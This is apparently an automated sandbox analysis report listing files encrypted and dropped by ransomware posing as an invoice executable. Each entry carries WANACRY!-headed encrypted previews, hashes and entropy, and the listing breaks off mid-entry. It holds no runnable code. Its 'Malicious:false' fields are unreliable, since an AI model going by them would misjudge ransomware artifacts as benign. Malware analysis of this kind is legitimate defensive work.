                                                          Preview:WANACRY!........cX.7v+.[S......%...@.-.....u........~..h..n .......N_.....3c.G.0D.qI.!\..D2~......8'...6.L..._...q..5.ZED.j...-..^H=.ez..ju.]98K}...&I.Y..V._,r...csz.q..M...L.).Q.....H.Ns.$...B..jO.~.7^-N.cJ.[.:.......5?..h(...._..&.....^x<.../..N...C..S..................}..@.R..G......W.r.d$......]M..............8n".!fQ<..{.&.]".....7...}...SA.Ir.Z...E...H..+53..<...VeK.U0.u...c..+#..d$.I=}.H.y(....*....N........6...........ES.b....xaV..U...U..e.~k..d....#9D.....1.M-wi.D..=.p.TCnB.!7...K..+....Q..M..0.8.9v..........N^rU..'J..........{.8...w#3i fwO....^+O..3.B.t.>..*......Y.o@.w..e..b..H^....{..U...2N...L4..t.R<.Z...\S.{.T.... ."....!"a=~5..{EN....R..t..se...7q.p<...P].'.a.~>.";~........i#...sS.X. H$..v.w..^..w.v.E....BOW.......-V6%....6..>l......T.]x.....2.W..../~..$S....Z.k}v5..\}.^..6..;......2...#...`Z.......U)..r@....Q.Eb...=.kQ..@.9...>......5.....s6.,..L..Z....N.PD.K,.oG.^.,.?ry....9.`....\nMg[...-...^e.[..M../. .b..I.T....~U..y

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\JJMNFRKQNU.jpg.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.845741568766271
                                                          Encrypted:false
                                                          SSDEEP:24:bkuxQG28YZnmGpMfyhGKSxHypDPAR94z6GE5eaEPwIqSIeVu/PXtiPZ4E:bkZG28YZ3M2GKS1ypDPAR94z6b5O1qSx
                                                          MD5:0603AF8BA5579C3B4E71F592B2B4773C
                                                          SHA1:E9B3B04AB28C7F8F99A41AFC8A5821354607766A
                                                          SHA-256:5FC2E52A5E481D4A90A0DED431983B89B00F93D533DE25C8B1BF7766837527FA
                                                          SHA-512:985BEDD8522C5575D04E5B8614499AB57045F35AA4083A7DBF4D48D9C67FCC174119D231DEAB349198B3FB320DA32A9E562C72C5CBF3EBA0454D8D28AD19DB34
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........cX.7v+.[S......%...@.-.....u........~..h..n .......N_.....3c.G.0D.qI.!\..D2~......8'...6.L..._...q..5.ZED.j...-..^H=.ez..ju.]98K}...&I.Y..V._,r...csz.q..M...L.).Q.....H.Ns.$...B..jO.~.7^-N.cJ.[.:.......5?..h(...._..&.....^x<.../..N...C..S..................}..@.R..G......W.r.d$......]M..............8n".!fQ<..{.&.]".....7...}...SA.Ir.Z...E...H..+53..<...VeK.U0.u...c..+#..d$.I=}.H.y(....*....N........6...........ES.b....xaV..U...U..e.~k..d....#9D.....1.M-wi.D..=.p.TCnB.!7...K..+....Q..M..0.8.9v..........N^rU..'J..........{.8...w#3i fwO....^+O..3.B.t.>..*......Y.o@.w..e..b..H^....{..U...2N...L4..t.R<.Z...\S.{.T.... ."....!"a=~5..{EN....R..t..se...7q.p<...P].'.a.~>.";~........i#...sS.X. H$..v.w..^..w.v.E....BOW.......-V6%....6..>l......T.]x.....2.W..../~..$S....Z.k}v5..\}.^..6..;......2...#...`Z.......U)..r@....Q.Eb...=.kQ..@.9...>......5.....s6.,..L..Z....N.PD.K,.oG.^.,.?ry....9.`....\nMg[...-...^e.[..M../. .b..I.T....~U..y

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\JJMNFRKQNU.xlsx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.806749398683385
                                                          Encrypted:false
                                                          SSDEEP:24:bks20vyDBMudfPrMyeAsUOROm9DoT2d/e7hcXp+qfbmH0:bkN06lMw3rFvdOROmGT2W7efw0
                                                          MD5:A92303DBD124013BF38F0B54753E576C
                                                          SHA1:1E2101455F67B15AF6D74349257BB3851103A175
                                                          SHA-256:38F41EE7FD97A2593C2FC206BA97AF51E2F04CC200B83F90199CBEB04E890110
                                                          SHA-512:93490DA5B84747F07D0014F1E03A2A78C74AD1AFDA2E38A5574196DD67EB81247666A64E577666B5CDE772D5D24DC3F0BCFCFEDAEB3DABD7732B1AF8C714DE66
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....jo....e.k...#.....("k...w?/.{z.p5/.......D.R.@....H...V.G....Wn..^1.7Q.>...w...B.=..<.....F..RB/.N....VB..'M.9..h.r..[,[...I.V.d....V....].K.{.r.. .H>...h.W~q..km.+..b.t0.HZ..Yg.0P.. ...2*..&..W.....r....R...<.Q(Y.n..,/......x..*6M.......foa.$i..y.............Vu.lE...:...5^u..X.!%XE....}..s.@.B.#......9.....?4-....c....})L..9`O...'4).<....+K..a...+.....T..Sv..g..W....N.....Sk>..X].....s..wV...).D.....<7z>.=..k..i]......K....s..Bp.\u....'.p.i..?.......?!.....H....f..jlEEX..6.#..V,.N..>>.]8J...v.1o......3)TM..@...y. -.]..x...#.........;]...].-...R.2pUn.L.O{P..'..+_8R...7./u:..E..-F...+..;...K].}>xH(e.?.ZrV<..R[..z.d.@(..Te.t...O..RL.]!sy..{s..P...c9.d.n..4}?. .'.U.,..+.|.:X..v....?@Zj..v...I......mW..c..{..i'.+Tzf.1.N'\.._..m....%t.....Y.j\...1.g.'0.._....$CV.."..L~.....^_/l..O)...W/.....o..n.L..O3.>R..4.,.V.O.0.tK<V.....g......K...v.}..W..e...N.Q..nk.6'...P.n...{..z......e..{.bW.3&........#F....+....W{.....F.<m..$.M\A...E..O$.

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\JJMNFRKQNU.xlsx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.806749398683385
                                                          Encrypted:false
                                                          SSDEEP:24:bks20vyDBMudfPrMyeAsUOROm9DoT2d/e7hcXp+qfbmH0:bkN06lMw3rFvdOROmGT2W7efw0
                                                          MD5:A92303DBD124013BF38F0B54753E576C
                                                          SHA1:1E2101455F67B15AF6D74349257BB3851103A175
                                                          SHA-256:38F41EE7FD97A2593C2FC206BA97AF51E2F04CC200B83F90199CBEB04E890110
                                                          SHA-512:93490DA5B84747F07D0014F1E03A2A78C74AD1AFDA2E38A5574196DD67EB81247666A64E577666B5CDE772D5D24DC3F0BCFCFEDAEB3DABD7732B1AF8C714DE66
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....jo....e.k...#.....("k...w?/.{z.p5/.......D.R.@....H...V.G....Wn..^1.7Q.>...w...B.=..<.....F..RB/.N....VB..'M.9..h.r..[,[...I.V.d....V....].K.{.r.. .H>...h.W~q..km.+..b.t0.HZ..Yg.0P.. ...2*..&..W.....r....R...<.Q(Y.n..,/......x..*6M.......foa.$i..y.............Vu.lE...:...5^u..X.!%XE....}..s.@.B.#......9.....?4-....c....})L..9`O...'4).<....+K..a...+.....T..Sv..g..W....N.....Sk>..X].....s..wV...).D.....<7z>.=..k..i]......K....s..Bp.\u....'.p.i..?.......?!.....H....f..jlEEX..6.#..V,.N..>>.]8J...v.1o......3)TM..@...y. -.]..x...#.........;]...].-...R.2pUn.L.O{P..'..+_8R...7./u:..E..-F...+..;...K].}>xH(e.?.ZrV<..R[..z.d.@(..Te.t...O..RL.]!sy..{s..P...c9.d.n..4}?. .'.U.,..+.|.:X..v....?@Zj..v...I......mW..c..{..i'.+Tzf.1.N'\.._..m....%t.....Y.j\...1.g.'0.._....$CV.."..L~.....^_/l..O)...W/.....o..n.L..O3.>R..4.,.V.O.0.tK<V.....g......K...v.}..W..e...N.Q..nk.6'...P.n...{..z......e..{.bW.3&........#F....+....W{.....F.<m..$.M\A...E..O$.

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LHEPQPGEWF.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.850152372547986
                                                          Encrypted:false
                                                          SSDEEP:24:bkUSO77xOcvJBjFDKLgi2Kyrl20mibod92JQCT5r46sUucUOPhkMNeZtBPOm9N8O:bkUSMvJBNKLx/Ylbi2JQCT+gjUOZteZP
                                                          MD5:AEEDD8D4453D4CD025A6F2F8904461CA
                                                          SHA1:D2BB29D043CDA83AD9FC831817F25918373A09DB
                                                          SHA-256:B55DDF77317EF0B67E8D798546F78D1995FB95D80580065E198002740DCEC567
                                                          SHA-512:0283AFD83CF9AFDBD800DCDCAE231C06B6452E4CA8058D61228381B3C58D1CA0486E0002BE1880446BC5FC3A9E83DE8D7B3CB7D461CAB9C06602843AC31DB9D6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....(.!$..{J.5C.pa...f<9;;,+...A.2]-l!>V.p..;..8.3............-[.....P0.O<.0.f.x....@}.n......(_3q........J...."..3Z^5...x..S.Z^..\.#...7.XxC.g..@....{(z b./H...d...K..'.l..eK..R....7.G.[.K..R...,Z...J ..c.....J..X..*.1p!h..=..~..M^S.5..A....@.mu..W............u,...~..U./.....qb..%..E.*.0..Ny.....wp.u.>.N..>.....B..n.......5..u=...-.t...h.K.t..S....o.h.........gyqJ-.S<T_.... ._..~a.Ey{..?.>f.....R./Ao...Sf....S.....5cxBf.}......<G...+.-./.X-.f..M.;..f....@L.r3./:.....T..;.o5 U.....MQ.uO...F.._!......QM...s0.B>H./...WZ.v... ...U..6H...Cmc...6z.|D....[.Ww......a..P<.F$.q.e.".q..O3....-..Z..*...*5j..Nx.X......q..9#..t<..".........w}..;.O.oe...J^.?C).|..s...].."...b.M..uO.<3.B&..D ....#.i...3.I1...s..U......g..$..4.....5..W./...m^.SM....~$x8-...$._3.y......_...dl...j8.f...s+..e:...A.a^J...-....t 'm_".U.x..!.....4.&3e...I*..V.2...ON.5.@M~...\$.{..F....3D..y/..G......G0......H_.N[.....k.4..R.)....s.(H.b.\.l..z...2....r..I.eF.)...sD.wW.

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LHEPQPGEWF.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.850152372547986
                                                          Encrypted:false
                                                          SSDEEP:24:bkUSO77xOcvJBjFDKLgi2Kyrl20mibod92JQCT5r46sUucUOPhkMNeZtBPOm9N8O:bkUSMvJBNKLx/Ylbi2JQCT+gjUOZteZP
                                                          MD5:AEEDD8D4453D4CD025A6F2F8904461CA
                                                          SHA1:D2BB29D043CDA83AD9FC831817F25918373A09DB
                                                          SHA-256:B55DDF77317EF0B67E8D798546F78D1995FB95D80580065E198002740DCEC567
                                                          SHA-512:0283AFD83CF9AFDBD800DCDCAE231C06B6452E4CA8058D61228381B3C58D1CA0486E0002BE1880446BC5FC3A9E83DE8D7B3CB7D461CAB9C06602843AC31DB9D6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....(.!$..{J.5C.pa...f<9;;,+...A.2]-l!>V.p..;..8.3............-[.....P0.O<.0.f.x....@}.n......(_3q........J...."..3Z^5...x..S.Z^..\.#...7.XxC.g..@....{(z b./H...d...K..'.l..eK..R....7.G.[.K..R...,Z...J ..c.....J..X..*.1p!h..=..~..M^S.5..A....@.mu..W............u,...~..U./.....qb..%..E.*.0..Ny.....wp.u.>.N..>.....B..n.......5..u=...-.t...h.K.t..S....o.h.........gyqJ-.S<T_.... ._..~a.Ey{..?.>f.....R./Ao...Sf....S.....5cxBf.}......<G...+.-./.X-.f..M.;..f....@L.r3./:.....T..;.o5 U.....MQ.uO...F.._!......QM...s0.B>H./...WZ.v... ...U..6H...Cmc...6z.|D....[.Ww......a..P<.F$.q.e.".q..O3....-..Z..*...*5j..Nx.X......q..9#..t<..".........w}..;.O.oe...J^.?C).|..s...].."...b.M..uO.<3.B&..D ....#.i...3.I1...s..U......g..$..4.....5..W./...m^.SM....~$x8-...$._3.y......_...dl...j8.f...s+..e:...A.a^J...-....t 'm_".U.x..!.....4.&3e...I*..V.2...ON.5.@M~...\$.{..F....3D..y/..G......G0......H_.N[.....k.4..R.)....s.(H.b.\.l..z...2....r..I.eF.)...sD.wW.

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LIJDSFKJZG.docx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.839837209114781
                                                          Encrypted:false
                                                          SSDEEP:24:bk29v4D4GzloMUqtN/MftQlSNcYvlgWpvr9FvbDq9DeYXLqMUAxwW8Tajcdu0v9z:bk2N4D4GzyatNkfIS/vlgWpvr9FDGUYW
                                                          MD5:74C7E38057688A78CFB7A788620FA3A6
                                                          SHA1:E829B6131735F224AE8E1412B12CB9B546E4F87C
                                                          SHA-256:5769DD9235CF9D9B5FF9C139CF1BABE309E85F5E6277D32F377DC449D97BDDFE
                                                          SHA-512:67891236EC3D45B5ADDC62E808EC15BA39E9E44DCEE0C733683CEA94F1B8814D683996A1AA9EE5047EFB6D5A19CF69FB0B1B6AAA5DEEC2BD088D094E32CCBAED
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......7:..Gt.~.(h.Q .7.Z.A.....g.ug.G...,..1...X.-Q....M.._.~..bw..z.;>.{.,<n...J......H..Hd.[6A.SQi=?.@..j.J../.Vw.r....W8v...{:;...('....{c.!..4..0{.\..A.^.x.'.hFA...V...G.........+r........!..Z...d,ZED........e..Z0....%q....+yF...&...4J.sx..................4.=..W...../...p0..Rb-:rk5...;.......n 5..A.-..0.2....4jj.'..Bzb...b..b....?D.$d..&..<.}....om.F..6.z..`...9....T.....gUX...[.cf..xJ.C.K.....$........@.._2.Q&...y.f..p.J.8....yMV.""9n].e.U..k..!w...5..m.{....Gd...B4..1...+.'b....[..B....~eN.}f9...A...Z..)`.......h.O.J.9v.....C....._..1.I.w.c.H:..........z..._<q&@........RE....M.p.fe.I.(.}j.+.;e5`..)v....3...... J.......;..I.Mj.......g...Z.6..}..%C./.....9=....._..4....~.'P83.Fc.K G...\...(1.D..../..&s.Ux..xi.ahj...w.1.9*..x;].l..%...l.... -\.$.=..|L.<.~S..z.Q..........X...J.8.....:..".......M)):T...K..%...jv.#...Z.....ud(v..(..x.A....iB...Jj..N....o3..]..c..j..z._....+.P..e...{...,..S.Z~...S.&.`.x-!s....eJ...P~..'.xI..a./.....\

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LIJDSFKJZG.docx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.839837209114781
                                                          Encrypted:false
                                                          SSDEEP:24:bk29v4D4GzloMUqtN/MftQlSNcYvlgWpvr9FvbDq9DeYXLqMUAxwW8Tajcdu0v9z:bk2N4D4GzyatNkfIS/vlgWpvr9FDGUYW
                                                          MD5:74C7E38057688A78CFB7A788620FA3A6
                                                          SHA1:E829B6131735F224AE8E1412B12CB9B546E4F87C
                                                          SHA-256:5769DD9235CF9D9B5FF9C139CF1BABE309E85F5E6277D32F377DC449D97BDDFE
                                                          SHA-512:67891236EC3D45B5ADDC62E808EC15BA39E9E44DCEE0C733683CEA94F1B8814D683996A1AA9EE5047EFB6D5A19CF69FB0B1B6AAA5DEEC2BD088D094E32CCBAED
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......7:..Gt.~.(h.Q .7.Z.A.....g.ug.G...,..1...X.-Q....M.._.~..bw..z.;>.{.,<n...J......H..Hd.[6A.SQi=?.@..j.J../.Vw.r....W8v...{:;...('....{c.!..4..0{.\..A.^.x.'.hFA...V...G.........+r........!..Z...d,ZED........e..Z0....%q....+yF...&...4J.sx..................4.=..W...../...p0..Rb-:rk5...;.......n 5..A.-..0.2....4jj.'..Bzb...b..b....?D.$d..&..<.}....om.F..6.z..`...9....T.....gUX...[.cf..xJ.C.K.....$........@.._2.Q&...y.f..p.J.8....yMV.""9n].e.U..k..!w...5..m.{....Gd...B4..1...+.'b....[..B....~eN.}f9...A...Z..)`.......h.O.J.9v.....C....._..1.I.w.c.H:..........z..._<q&@........RE....M.p.fe.I.(.}j.+.;e5`..)v....3...... J.......;..I.Mj.......g...Z.6..}..%C./.....9=....._..4....~.'P83.Fc.K G...\...(1.D..../..&s.Ux..xi.ahj...w.1.9*..x;].l..%...l.... -\.$.=..|L.<.~S..z.Q..........X...J.8.....:..".......M)):T...K..%...jv.#...Z.....ud(v..(..x.A....iB...Jj..N....o3..]..c..j..z._....+.P..e...{...,..S.Z~...S.&.`.x-!s....eJ...P~..'.xI..a./.....\

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MIVTQDBATG.pdf.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.867830108387937
                                                          Encrypted:false
                                                          SSDEEP:24:bkQxqsOg/vNNQlb2RRlejdl/DVzBBLkw6L5A4rgm0Zqma3wAl2WvSLwJTGINxzs8:bkQwsPHQoRRleRl/DVl9x6Le4QjE2Xsb
                                                          MD5:B24E662910CE877831753BC556455CA3
                                                          SHA1:5F76950C3617F24819E951FB7595627B05DED8FB
                                                          SHA-256:0F1AE6AF2F9FF57A2D5EB60C317196AD7734C0260603ECEBA7BD08C1395506DC
                                                          SHA-512:C324E84411A5681E9756138B7E6CA535BCDAF82363E2722FDC5B2E3955E3D6952E991DA4465EBDE7E6BA3C2924F9B6967091794ADAC663D340BE785FABCB842E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........^..O.k...../[.)..p.........g}6...)38..x..yXx.F..|U6...x......q!.............C...-bR..m..l....L.j...lV../.].}V.`...S..f79.'.......x..)&O.O..NZ..>..(eisR.R0c....z?(Y......"W........l.o....ku$7......iV.......toPf../..............O.M+g=..*................}.W....C..Y...Q[.t|.....C.U....5...U.V.......-"........29...z.e.3..M.Cd..<..}...........@?........N..c..6.#Y.^d...Q'7.e...3....E/.).{1.g..!.e@Z..R...8..cZ&..*G.{.w....B&.K%..n........'.O.".Z0ZP......T.]*.l1a`v.G..]Fy.W.=..|.?I...$.`s`..F...5..i...P.=..pVqf/..L...T..D.A.4...11.Ke...gD.M..4.o..re..m..S...zWqT....v....u...y....K:._.nY7y..\....y...3.pw...}3Sa2..N.?.l..>.)L~..|_...03.k.5.;..'q.....x.A<5C.);%......[.Z}....+..g..`=...<...+."..J4..6>.N..I...../...L..h.X.C...........P..:...CN.:+E5..^em..K.._.=.X.j*...}..),..bc..*.I&(TN...R.|."D.{#.8.<zh......#k\<S.i..G.b...?X...6}.&..!d.A3..:..Gu@..i..)-B.v4&..M....@....UE..4z...9. x...w4f....].{X....W..:0.....I).YI4.s.A.D&v..l/.2

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MIVTQDBATG.pdf.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.867830108387937
                                                          Encrypted:false
                                                          SSDEEP:24:bkQxqsOg/vNNQlb2RRlejdl/DVzBBLkw6L5A4rgm0Zqma3wAl2WvSLwJTGINxzs8:bkQwsPHQoRRleRl/DVl9x6Le4QjE2Xsb
                                                          MD5:B24E662910CE877831753BC556455CA3
                                                          SHA1:5F76950C3617F24819E951FB7595627B05DED8FB
                                                          SHA-256:0F1AE6AF2F9FF57A2D5EB60C317196AD7734C0260603ECEBA7BD08C1395506DC
                                                          SHA-512:C324E84411A5681E9756138B7E6CA535BCDAF82363E2722FDC5B2E3955E3D6952E991DA4465EBDE7E6BA3C2924F9B6967091794ADAC663D340BE785FABCB842E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........^..O.k...../[.)..p.........g}6...)38..x..yXx.F..|U6...x......q!.............C...-bR..m..l....L.j...lV../.].}V.`...S..f79.'.......x..)&O.O..NZ..>..(eisR.R0c....z?(Y......"W........l.o....ku$7......iV.......toPf../..............O.M+g=..*................}.W....C..Y...Q[.t|.....C.U....5...U.V.......-"........29...z.e.3..M.Cd..<..}...........@?........N..c..6.#Y.^d...Q'7.e...3....E/.).{1.g..!.e@Z..R...8..cZ&..*G.{.w....B&.K%..n........'.O.".Z0ZP......T.]*.l1a`v.G..]Fy.W.=..|.?I...$.`s`..F...5..i...P.=..pVqf/..L...T..D.A.4...11.Ke...gD.M..4.o..re..m..S...zWqT....v....u...y....K:._.nY7y..\....y...3.pw...}3Sa2..N.?.l..>.)L~..|_...03.k.5.;..'q.....x.A<5C.);%......[.Z}....+..g..`=...<...+."..J4..6>.N..I...../...L..h.X.C...........P..:...CN.:+E5..^em..K.._.=.X.j*...}..),..bc..*.I&(TN...R.|."D.{#.8.<zh......#k\<S.i..G.b...?X...6}.&..!d.A3..:..Gu@..i..)-B.v4&..M....@....UE..4z...9. x...w4f....].{X....W..:0.....I).YI4.s.A.D&v..l/.2

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NIRMEKAMZH.mp3.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.844865842767799
                                                          Encrypted:false
                                                          SSDEEP:24:bkHklBrWjER4A9yNSLwUtT5TzeTfPC3cToeJdw3LyGEdC+m97ioyL3pF2Ib:bkHkfWjEGPNSLwGT5333cTjK7v+mZio+
                                                          MD5:5BD1ACCF2C8C52500FD0CE37BCA9E4A4
                                                          SHA1:1B86EC7301C2679A2458E3EA28D59F5374D818C4
                                                          SHA-256:74FC70CA6B58D2D92FA3364C13C52D752F5EDE3CDBB451902B2EACEA0E82B336
                                                          SHA-512:3FB9A3FCB067A672F1C15A7DDB71D6C0FC3E67CF695ED7C343C99A6978E7205328EA4AA834038090680493EEA1D2B5DAA0EEDAD0DC0AC1D71F9405A8BD2D79F7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...........25....Lfn_W...w....dW.h.w.^|$..t.d..^..qp...M...q.;.C.]G.,;.3w8..s ...HZ.g..;`b.[{m..4....7#...=%....D...a...5...C.....r.....!S.R'.H.?\...a....t0....xOh7a.;.52~.=.Fp...-..+..........4JTl..\..p.m.R..w..|Y*.s.6...U...r?Y ....N.@v.....A8............].0b....c.r7|w1....U.&m..E......nKC.|..X/+..%.<@.B.."...H{.1-...*.s...<.H..).oQ............W..0x0Wh.e-.e......g-[\..QP..d..6.7.SI....z.@.}\$..*.-.`B.....Ju^.V8.{@.:h.Z..3V..J..++....Igw..a....+[w......G.n0}&..b2.=.&..|zb..cH...........8....G...1.r..3.?... p.......;,_.*"p..."m......e2uW..(A.5!#bF...us...+....*h.0V.y..q4QkMHg.-.m....F....8.. ?.O..s...V(...E.2..Oy.G...C...5.U..V...5.{#.#j.x...q..F!.&./.Yl.....o........ekI..oS...F....f@.Rc....*..Op....>....tx...L......A...n.....[.3.t....v...a..(IhC:...!.C/.7.mXE.7..b.N.....i.".E.'..da..Y..1)..A.h..0.@M..Y..1......>..<..,.*.I...?...km5..^.[u....G^^f....>?.o.R......8.5..J>4.*.<AD...TLz.D56....[...G6CaN=y...A..Y.s..AX...@[.:@.m..

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NIRMEKAMZH.mp3.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.844865842767799
                                                          Encrypted:false
                                                          SSDEEP:24:bkHklBrWjER4A9yNSLwUtT5TzeTfPC3cToeJdw3LyGEdC+m97ioyL3pF2Ib:bkHkfWjEGPNSLwGT5333cTjK7v+mZio+
                                                          MD5:5BD1ACCF2C8C52500FD0CE37BCA9E4A4
                                                          SHA1:1B86EC7301C2679A2458E3EA28D59F5374D818C4
                                                          SHA-256:74FC70CA6B58D2D92FA3364C13C52D752F5EDE3CDBB451902B2EACEA0E82B336
                                                          SHA-512:3FB9A3FCB067A672F1C15A7DDB71D6C0FC3E67CF695ED7C343C99A6978E7205328EA4AA834038090680493EEA1D2B5DAA0EEDAD0DC0AC1D71F9405A8BD2D79F7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...........25....Lfn_W...w....dW.h.w.^|$..t.d..^..qp...M...q.;.C.]G.,;.3w8..s ...HZ.g..;`b.[{m..4....7#...=%....D...a...5...C.....r.....!S.R'.H.?\...a....t0....xOh7a.;.52~.=.Fp...-..+..........4JTl..\..p.m.R..w..|Y*.s.6...U...r?Y ....N.@v.....A8............].0b....c.r7|w1....U.&m..E......nKC.|..X/+..%.<@.B.."...H{.1-...*.s...<.H..).oQ............W..0x0Wh.e-.e......g-[\..QP..d..6.7.SI....z.@.}\$..*.-.`B.....Ju^.V8.{@.:h.Z..3V..J..++....Igw..a....+[w......G.n0}&..b2.=.&..|zb..cH...........8....G...1.r..3.?... p.......;,_.*"p..."m......e2uW..(A.5!#bF...us...+....*h.0V.y..q4QkMHg.-.m....F....8.. ?.O..s...V(...E.2..Oy.G...C...5.U..V...5.{#.#j.x...q..F!.&./.Yl.....o........ekI..oS...F....f@.Rc....*..Op....>....tx...L......A...n.....[.3.t....v...a..(IhC:...!.C/.7.mXE.7..b.N.....i.".E.'..da..Y..1)..A.h..0.@M..Y..1......>..<..,.*.I...?...km5..^.[u....G^^f....>?.o.R......8.5..J>4.*.<AD...TLz.D56....[...G6CaN=y...A..Y.s..AX...@[.:@.m..

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ORJXLKGWYJ.jpg.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.864688134686405
                                                          Encrypted:false
                                                          SSDEEP:24:bkvZKXcJ39/aKH1o0UGvatqX3AdQvy8Rj6EEpc/twLKxPj0vFB8lAuI3q747ia:bkjJ3YV9tIAoAfuwLKxLkT8lt7s
                                                          MD5:07EFE5D9FD1ABEB050A148F40BE168F3
                                                          SHA1:7558C9C4955CE8065B28359393E4A8611AAE4EF3
                                                          SHA-256:ABAED11987B20884B76C0EA23EEB588AECD7B678C048E0D60AAC08FBFC7D7506
                                                          SHA-512:DD20B5F193955EF9730BF2ACD267AB0AB5DA19D3F42F19045E699D327CB3369B8B879B6D22A0BC4ABCEA9DBDB6B1E6EBDDD1672BCC7897022887E2274F58F4A0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....z...;]G...A.*6...F..k..N.~(...D..Bce.. ...!..T,.-7W.'.$..A.7(.I.:9G.....s...e..sy.1#$@.O.R......3d..z.%.z.[2&.ks.l.....s..D....z......f.....#r.Laws.+K..4.Zy.n...i.Q.....<q?....@........>A.j..[~...M.........*...2..M.\.f5..Ai.L.DI.C...xRc................~.@%.....-...P....Z.$p`.......1..bh..y.+.KE$X.!G..|(b..Q.....,...E...v...S.3..B..!...,...T.R.Rg..H........a...Ae.....t....#Y..o.k.=..N.}..e..J.vgs..\TN.0..l..M.,...-3..Fq.Z7A0.+....m..=1..M-...<Hd..G...o.w....=Nw.vH...$M...x.Jh/.V......&.5.[cdr..N...@..<..B.....9Y.l..<X....8.[D>.'......s;. .h.|..r..L...H..g..N>..G...J....z..!.....2..F#a...dr...ud.*......:..A.6.].q.8.,j..KH..e....'.8........[.h`[..... .....]........bd...I.g.b..e........k...%.....R...\.[@ZF.(.-U..k..Q..6...'Z..0{.4_js.{.....<A.!QN0V.F....qIl..D.)p%.....i....W._(...f...|9).I._ ;..R[#...ag*.[....2z.D:0H....HK...k....L.....1m..@....Vx.]....7....#9.....8.O.h.Z#..g.4....S.^y6.....r~.[.r..#*E..k~'.W.^.h.)...U..

                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ORJXLKGWYJ.jpg.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.864688134686405
                                                          Encrypted:false
                                                          SSDEEP:24:bkvZKXcJ39/aKH1o0UGvatqX3AdQvy8Rj6EEpc/twLKxPj0vFB8lAuI3q747ia:bkjJ3YV9tIAoAfuwLKxLkT8lt7s
                                                          MD5:07EFE5D9FD1ABEB050A148F40BE168F3
                                                          SHA1:7558C9C4955CE8065B28359393E4A8611AAE4EF3
